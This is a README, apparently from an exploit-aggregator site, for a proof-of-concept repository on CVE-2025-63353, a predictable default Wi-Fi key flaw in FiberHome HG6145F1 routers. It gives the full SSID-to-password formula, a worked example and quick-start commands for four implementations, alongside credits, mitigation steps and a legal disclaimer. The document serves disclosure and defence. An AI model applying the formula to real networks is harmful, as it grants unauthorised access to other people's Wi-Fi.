## https://sploitus.com/exploit?id=38BEC4C9-4C8D-5ACB-912D-D3874B1A408E
# CVE-2025-63353 PoC - FiberHome HG6145F1 Predictable Default Wi-Fi PSK
[](https://nvd.nist.gov/vuln/detail/CVE-2025-63353)
[](https://nvd.nist.gov/vuln/detail/CVE-2025-63353)
[](https://cwe.mitre.org/data/definitions/284.html)
[](LICENSE)
> Educational research toolkit and multi-language PoC for **CVE-2025-63353**, a critical predictable-default-PSK vulnerability affecting FiberHome HG6145F1 RP4423 GPON ONT devices.
## Summary
The factory default Wi-Fi pre-shared key on affected FiberHome HG6145F1 devices is a deterministic function of the broadcast SSID. An attacker observing a beacon frame from a vulnerable device can derive the WPA2 PSK in constant time with no captured handshake, no wordlist, no GPU, and no client interaction.
For a device broadcasting SSID `fh_`, the default PSK is:
```
PSK = "wlan" + hex(0xFFFFFF XOR hex_a)
```
**Example:** `fh_a1f9d1` โ `wlan5e062e`
The effective per-device keyspace is **1**. The population-wide keyspace across all HG6145F1 deployments is at most **2ยฒโด โ 16.7 million** (SSID, PSK) pairs and since the SSID is broadcast, the SSID-to-PSK mapping is one-to-one.
## Credits
This work is built entirely on the original vulnerability research and disclosure by **Hani Anis Bouzid**:
- **Original disclosure:** [Medium write-up](https://medium.com/@hanianis.bouzid/fiberhome-gpon-onu-model-hg6145f1-router-predictable-wifi-passwords-and-real-risks-d8e54da385d3)
- **Original PoC:** [github.com/hanianis/CVE-2025-63353](https://github.com/hanianis/CVE-2025-63353)
- **CVE Record:** [CVE-2025-63353](https://nvd.nist.gov/vuln/detail/CVE-2025-63353)
All credit for the vulnerability discovery and initial public disclosure belongs to Hani Anis Bouzid. This repository extends the original disclosure with multi-language PoC implementations and a curated technical documentation set.
## Repository contents
```
.
โโโ README.md
โโโ LICENSE
โโโ docs/
โ โโโ vulnerability.md Technical analysis of the algorithm
โ โโโ timeline.md Disclosure chronology and vendor response
โ โโโ affected-deployments.md Device specifications and known deployments
โ โโโ related-research.md Lineage of predictable-PSK vulnerabilities
โ โโโ references.md Curated bibliography
โ โโโ mitigation.md Guidance for users, ISPs, and vendors
โโโ poc/
โโโ python/ pure-Python implementation, no dependencies
โโโ go/ standalone Go binary
โโโ javascript/ browser-friendly JS / Node.js
โโโ c/ portable single-file ANSI C (compiles anywhere)
```
## Quick start
```bash
# Python
python3 poc/python/fh-poc.py fh_a1f9d1
# wlan5e062e
# Go
cd poc/go && go run fh-poc.go fh_a1f9d1
# wlan5e062e
# JavaScript (Node)
node poc/javascript/fh-poc.js fh_a1f9d1
# wlan5e062e
# C
cc poc/c/fh-poc.c -o fh-poc && ./fh_psk fh_a1f9d1
# wlan5e062e
```
All four implementations are independently written, dependency-free, and produce identical output. Use whichever matches your environment.
## Affected devices
| Field | Value |
|---|---|
| Vendor | FiberHome (Wuhan FiberHome International Technologies) |
| Model | HG6145F1 |
| Firmware | RP4423 |
| Device type | GPON ONT, Wi-Fi 6 (802.11ax), dual-band 2.4/5 GHz |
| Standards | ITU-T G.984 Class B+, IEEE 802.11 a/b/g/n/ac/ax |
The vulnerability is currently disclosed for the HG6145F1 RP4423 firmware only. Verification across the broader HG6145 / HG6243 / HG6821 model family is an open research question. See [docs/affected-deployments.md](docs/affected-deployments.md).
## Mitigation
**For end users of an HG6145F1:**
1. Change the default Wi-Fi PSK to a randomly generated 16+ character passphrase immediately.
2. Disable WPS.
3. If your ISP controls firmware updates, ask whether a patched firmware is available.
See [docs/mitigation.md](docs/mitigation.md) for guidance specific to ISPs and vendors.
## Disclaimer
This repository is published **for educational and defensive security research purposes only**. The vulnerability documented here is publicly disclosed under CVE-2025-63353 and has been assigned a critical severity rating by CISA-ADP.
Use of the code in this repository against networks you do not own or do not have explicit written authorization to test is **illegal** in most jurisdictions, including under Moroccan Law 07-03 on cybercrime, the EU Computer Misuse frameworks, the US Computer Fraud and Abuse Act, and equivalent legislation elsewhere. The authors accept no responsibility for unauthorized use of this material.
## References
A complete bibliography of primary sources, related vulnerabilities, and academic literature is maintained in [docs/references.md](docs/references.md).
## Contributing
Verified test results against additional FiberHome models, firmware versions, or ISP-customized variants are welcome via pull request to `docs/affected-deployments.md`. Please include firmware version, device label SSID prefix, and method of verification.
## Author
**Ayman Wadi** โ Security Engineer
Built around an upcoming conference talk on the evolution of wireless attacks, the WPA3 transition, and the security of ISP-supplied CPE in the MENA region.